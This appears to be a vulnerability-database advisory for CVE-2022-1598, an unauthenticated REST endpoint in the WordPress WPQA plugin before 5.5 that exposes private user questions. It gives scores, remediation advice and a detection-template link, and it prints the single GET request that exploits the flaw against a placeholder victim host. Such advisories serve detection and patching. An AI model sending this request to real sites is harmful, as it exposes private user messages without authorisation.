🔙 목록으로 돌아가기

CVE-2022-1598: WordPress WPQA <5.5 - Improper Access Control

TitleWordPress WPQA <5.5 - Improper Access Control
Authorveshraj
SeverityMedium
ImpactThis vulnerability can result in unauthorized access to sensitive information, potentially leading to data breaches or unauthorized actions.
RemediationUpdate the WPQA plugin to version 5.5 or later to fix the improper access control issue.
CVSS Score5.3
EPSS Score0.25754
CVE IDCVE-2022-1598
CWE IDCWE-306
Tags cve cve2022 wordpress wp-plugin wpqa idor wpscan 2code vuln

🔍 Vulnerability Description

WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.

🌐 HTTP Request

GET /wp-json/wp/v2/asked-question HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.2 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1598.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1598.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A